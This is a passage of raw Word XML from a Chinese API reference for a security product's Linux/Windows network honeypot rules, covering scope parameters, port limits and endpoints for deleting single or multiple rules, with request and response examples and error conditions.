          <w:p w14:paraId="0DA5F381" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="327B50D7" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>业务组列表，如果</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>realmType</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>=1, 则</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>agentIds</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>和groups至少有一个不为空</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="74267AD4" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="04A25900" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>agentIds</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="633D045A" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String数组</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="36DCE91B" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="53E786AD" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>主机列表，如果</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>realmType</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>=1, 则</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>agentIds</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>和groups至少有一个不为空</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="567B2291" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="03430B02" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:lastRenderedPageBreak/>
              <w:t>excludeGroups</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3E0A0619" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>int数组</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2198B3AB" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7A3175A5" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>排除业务组列表</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="48A20051" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4CE9F69B" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>excludeAgentIds</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="46A681A8" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String数组</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7CC8F2B4" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4413DA14" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>排除主机列表</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="495C6E79" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="09F2EF1B" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>ports</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="47CBA3D1" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>int数组</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6A586DED" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>是</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5D7E179B" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>端口列表（端口个数不能超过5个）</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="7A06F7A3" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>请求示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="785726B1" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>/external/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>api</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/detect/honeypot/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>linux</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/rules</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42744585" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>返回示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="019BC47B" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>{</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "flag": true</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FCD48E5" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>异常说明：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11726B76" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="46"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>范围参数不合法，则会抛出异常及相关提示</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D914CE1" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="46"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>范围为自定义范围时，业务组和主机同时为空，则会抛出异常及相关提示</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A3F4AB9" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="46"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>端口为空，或端口数量大于5，会抛出异常及相关提示</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69228621"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BC669E" w14:paraId="78A062E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C80819E" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="18F97E3E" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="366CBD1B" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>建议长度</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="049F9193" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="67BBDC38" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3C003CF2" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>flag</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="702EECBF" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>Boolean</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="533D5D9C" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>tinyint</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>1)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="743D1E2F" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>true:成功 false:失败</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="2CFC46F5" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:bookmarkStart w:id="333" w:name="_Toc115166239"/>
      <w:bookmarkStart w:id="334" w:name="删除单条规则"/>
      <w:bookmarkEnd w:id="332"/>
      <w:r>
        <w:t>删除单条规则</w:t>
      </w:r>
      <w:bookmarkEnd w:id="333"/>
    </w:p>
    <w:p w14:paraId="653AED15" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:t>该接口提供Linux/Windows网络蜜罐删除主机规则功能。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20A634CB" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>调用接口：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23441462" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>DELETE /external/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>api</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/detect/honeypot/{</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>linux,win</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>}/rule/{id}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05CEB5C4" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>请求参数：</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="0020" w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="0" w:noVBand="0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="630"/>
        <w:gridCol w:w="777"/>
        <w:gridCol w:w="1044"/>
        <w:gridCol w:w="854"/>
      </w:tblGrid>
      <w:tr w:rsidR="00BC669E" w14:paraId="12428C3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61FE296" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="70449225" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="11A786BC" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>是否必填</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="62E8A659" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="6A2DF33E" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1E08B77A" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>id</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4F7372F9" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1B0EA861" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>是</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1C5E56A0" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>主机ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="7FD9776C" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>请求示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54C76BA2" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>/external/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>api</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/detect/honeypot/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>linux</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/rule/70db8ef89e9ae79a</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01791A5F" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>返回示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DF54CEF" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>{</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "flag": true</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66953CEC" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>异常说明：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="064F15BF" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="47"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>规则主机不存在，则会抛出异常及相关提示</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="230200AD" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="47"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>规则不存在，则会抛出异常及相关提示</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EE0C0D8" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="47"/>
        </w:numPr>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>帐号</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>没有权限，会抛出异常及相关提示</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F52E9B3" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="47"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>规则同步中不能删除，会抛出异常及相关提示</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1ADC3998" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="47"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>规则启用状态不能删除，会抛出异常及相关提示</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D9A2D3A"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BC669E" w14:paraId="77EE34E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EC5B59A" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="31D4C33E" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4A52E363" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>建议长度</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="68EA19D7" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="4E3857A4" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="086F8B89" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>flag</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3A48BA8C" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>Boolean</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1329540B" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>tinyint</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>1)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3389F2E7" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>true:成功 false:失败</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="6287129B" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:bookmarkStart w:id="335" w:name="_Toc115166240"/>
      <w:bookmarkStart w:id="336" w:name="批量删除规则"/>
      <w:bookmarkEnd w:id="334"/>
      <w:r>
        <w:t>批量删除规则</w:t>
      </w:r>
      <w:bookmarkEnd w:id="335"/>
    </w:p>
    <w:p w14:paraId="72E1B0F4" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:t>该接口提供Linux/Windows网络蜜罐批量删除主机规则功能。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="574E6904" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>调用接口：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="761F9957" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>DELETE /external/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>api</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/detect/honeypot/{</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>linux,win</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>}/rules</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="354A851C"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225"/>
        <w:gridCol w:w="1199"/>
        <w:gridCol w:w="1014"/>
        <w:gridCol w:w="6644"/>
      </w:tblGrid>
      <w:tr w:rsidR="00BC669E" w14:paraId="7EBF59B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6E1493C" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:lastRenderedPageBreak/>
              <w:t>字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0BC32FE8" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5A119818" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>是否必填</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7004AF20" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="5505D147" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
